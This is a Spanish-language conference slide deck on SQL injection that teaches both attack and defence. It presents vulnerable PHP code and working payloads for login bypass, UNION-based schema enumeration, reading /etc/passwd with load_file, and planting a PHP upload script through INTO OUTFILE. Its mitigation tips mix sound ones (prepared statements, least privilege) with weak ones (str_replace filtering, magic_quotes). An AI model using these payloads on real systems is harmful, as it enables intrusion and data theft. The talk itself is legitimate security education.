Seguridad WEB: SQL INJECTION

Speaker: PUA. Juan Francisco BoscoContact:boscofrancisco@hotmail.com

Blog: http://magnobalt.blogspot.com

Historia de SQL• 1970 Donald Chamberlin en los laboratorios de investigación de IBM. Este

lenguaje se llamaba SEQUEL (Structured English Query Language).

• 1977 fue rescrito y se denomino SEQUEL/2, y finalmente por motivos legales, termina convirtiéndose en SQL.

• 1986, el ANSI adoptó SQL como estándar para los lenguajes relacionales

• 1987 se transfomó en estándar ISO

• Antes de 1990: Esquema Centralizados

• Actualidad: Internet

¿SQL INJECTION?

1# TOP TEN

• Vulnerabilidad: Se radica en la capa de aplicacion.

• Error: Mal filtrado en las variables de entradas a la DB.

• Alcanze: Cualquiera puede inyectar codigo SQL que será interpretado por el DBMS, pudiendo comprometer al HOST.

ESQUEMA

Ataques a la Seguridad

Integridad: Borrado o corrupcion de dato• INSERT, DELETE, DROP.

Disponibilidad: Denegacion de Servio• Consultas pesadas, exploit.

Confidencialidad: Obtención de información sensibles.• Bypass de autenticación• Inyección con UNION• Basadas en errores• Blind SQL Injection

0x01- Bypass de Autenticacion (POST)

Codigo Vulnerable:

1.$usuario=$_POST['nombre'];2.$password=$_POST['pass'];3.$sql="SELECT * FROM usuario WHERE usuario='$usuario' AND password='$password'";4.$login=mysql_query($sql,$conexion);

Caso Normal:

SELECT * FROM usuario WHERE usuario='admin' AND password='admin123'

Caso con inyección de SQL: 'or 1=1--

SELECT * FROM usuario WHERE usuario=''or 1=1-- ' AND password='loquesea'

DEMO 1

0x02 – Ataque con UNION (GET)

Codigo Vulnerable:

1.if(isset($_GET['id']) && !empty($_GET['id'])){2.$id=$_GET['id'];3.$sql="SELECT * FROM conceptos WHERE ID =$id";4.$query=mysql_query($sql)

1) Verificando la falla:Podemos provocar distintos comportamientos en una web lo cual nos dará indicios de que la misma es vulnerable.

DEMO 1

DEMO 2

2) Contando campos:

Clausula UNION: Se usa para combinar el resultado de un número de comandos SELECT en un conjunto de resultados. Para usarlo nesesitamos la cantidad de campos que tiene el primer SELECT.

1- Con ORDER BY: La forma es ir ordenando la salida de la consulta por el número de posición de cada columna, una por una, hasta que sobrepase el limite de campos.

2- Con UNION: Consiste en poder ir colocando columnas hasta que la sentencia UNION se ejecute correctamente.

DEMOSTRACIÓN

3) Recoleccion de datos

MySQL contiene variables y funciones que otorgan informacion al usuario, donde las mismas pueden ser usadas para obtener datos importantes para el atacante.

• version()• user()• database()• @@datadir

SELECT * FROM NOTICIAS WHERE id= -1 UNION SELEC 1,version(),3

4)Information Schema

El soporte para INFORMATION_SCHEMA está disponible en MySQL 5.0.2 y posterior. Proporciona acceso a los metadatos de la base de datos. Metadatos son datos acerca de los datos, tales como el nombre de la base de datos o tabla, el tipo de datos de una columna, o permisos de acceso.

4.1)Obtener tablas mediante SCHEMA

Podemos obtener la informacion de todas las tablas en la base de dato gracias a la vista, information_schema.tables.

SELECT * FROM NOTICIAS WHERE id= -1 UNION SELEC 1,table_name,3 FROM INFORMATION_SCHEMA.TABLES

4.2) Obtener columnas mediante SCHEMA.

De la misma manera que obtuvimos las tablas podemos conocer los nombres de las columnas de una respectiva tabla

consultando la vista information.schema.columns

SELECT * FROM NOTICIAS WHERE id= -1UNION SELECT 1,column_name,3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'NAMETABLA'

0x03 Inyecciones SQL que Comprometen al Host

Si el usuario que esta ejecutando las consultas SQL tiene el permiso de FILE, podemos dar uso de las clausulas LOAD_FILE e INTO OUTFILE.

1) LOAD_FILE

Nos permite leer un archivo, y obtenerlo como una cadena.

SELECT * FROM NOTICIAS WHERE id= -1UNION SELECT 1,load_file('/etc/passwd'),3

Probocando lo que se conoce como PATH DISCLOSURE, obtenemos el DocumentRoot de la web, para poder leer los archivos PHP.

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/magno/www/joinea/index.php on line 49

Fabricamos la inyección:

SELECT * FROM NOTICIAS WHERE id= -1UNION SELECT 1,load_file('/home/magno/www/joinea/index.php'),3

2) INTO OUTFILE

Esta clausula permite volcar el contenido de una tabla, a un archivo. Para poder usarla con exito en una inyección nesesitaremos, permiso de escritura en algun directorio del DocumentRoot, y las magic_quotes= off.

El codigo subido debe ser pasado a Hexadecimal:

0x484f4c41204a4f494e45412032303130: HOLA JOIENA 2010

Fabricamos la inyección:

SELECT * FROM NOTICIAS WHERE id= -1 UNION SELECT null,0x484f4c41204a4f494e45412032303130,null INTO OUTFILE '/home/magno/www/joinea/imagenes/joinea.txt'

Subiendo un Upload en PHP:

<html><form enctype="multipart/form-data" action="" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></html><?php $target_path = ""; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(isset($_FILES['uploadedfile']['name'])){if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {echo "El Archivo ". basename( $_FILES['uploadedfile']['name']). "Ha sido Subido :)";} else{echo "Hubo un error, intentar otra vez!!";}}?>

0x04 SQLi en CMS:1#

2#

0x04 Las soluciones: Tips

1. Addslashes()

$usuario=addslashes($_POST['nombre']);

$usuario='or 1=1 # output: \' or 1=1

Similar: mysql_real_escape_string()

2. Magic_quotes: Habilitar en la configuracion de PHP (php.ini) al valor On. Esta caracteristica es despreciable a partir de PHP 5.3.0 y sera removido en la version 6.0.

3. int()

$id=(int)$_GET['id'];

4. is_numeric()

if (is_numeric($_GET['id']){ echo “Es un entero”;}

5. str_replace()

$cadena = str_replace ("'", "", $cadena);$cadena = str_replace ("UNION", "", $cadena);$cadena = str_replace ("OR", "", $cadena);

6. Prepared Statements:

$mysqli = new mysqli('localhost', 'user', 'pass', 'db');$stmt= $mysqli ->prepare("SELECT usuario FROM usuarios WHERE usuario=?");$stmt->bind_param('s', $usuario);$stmt->execute();

7. Seguir el principio de mínimo privilegio en las conexiones con bases de datos.

8. El filtrado debé realizarse en el servidor en ultima instancia (no confiar en JavaScript, Flash etc).

9. No dar información detallada sobre los errores▪ “Contraseña incorrecta para el usuario usuario”.▪ “Error al conectar a la base de datos midb“.

Muchas Gracias por su atención!

EOF